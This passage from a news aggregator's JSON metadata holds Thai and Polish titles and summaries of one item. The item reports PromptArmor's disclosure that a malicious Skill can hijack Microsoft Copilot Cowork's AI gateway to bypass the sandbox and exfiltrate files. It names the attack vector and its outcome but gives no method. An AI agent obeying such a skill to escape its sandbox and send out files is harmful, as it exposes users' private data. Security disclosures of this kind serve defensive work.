file.","url":"https://www.aioga.com/id/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:28:20.161Z"},"th":{"title":"PromptArmor เปิดเผยช่องโหว่ Copilot Cowork AI Gateway ถูกยึดเพื่อหลีกเลี่ยง Sandbox และส่งไฟล์ออกไป","summary":"PromptArmor เปิดเผยว่าเกตเวย์ AI ของ Microsoft Copilot Cowork สามารถถูก Skill ที่เป็นอันตรายยึดเพื่อหลีกเลี่ยง sandbox และส่งออกไฟล์","category":"行业动态","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor เปิดเผยช่องโหว่ Copilot Cowork AI Gateway ถูกยึดเพื่อหลีกเลี่ยง Sandbox และส่งไฟล์ออกไป - ข่าว AI Aioga","description":"PromptArmor เปิดเผยว่าเกตเวย์ AI ของ Microsoft Copilot Cowork สามารถถูก Skill ที่เป็นอันตรายยึดเพื่อหลีกเลี่ยง sandbox และส่งออกไฟล์","url":"https://www.aioga.com/th/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:34:08.645Z"},"pl":{"title":"PromptArmor ujawnia lukę w Copilot Cowork AI Gateway umożliwiającą obejście sandboxa i wyciek plików","summary":"PromptArmor ujawnia, że brama AI Microsoft Copilot Cowork może zostać przejęta przez złośliwe umiejętności w celu obejścia sandboxu i wyprowadzenia plików.","category":"行业动态","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor ujawnia lukę w Copilot Cowork AI Gateway umożliwiającą obejście sandboxa i wyciek plików - Aioga Wiadomości AI","description":"PromptArmor ujawnia, że brama AI Microsoft Copilot Cowork może zostać przejęta przez złośliwe umiejętności w celu obejścia sandboxu i wyprowadzenia plików.","url":"https://www.aioga.com/pl/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:33:40.981Z"}},"evidenceTier":"verified-news","reviewStatus":"editorial-selected","indexable":true,"editorialCover":""}}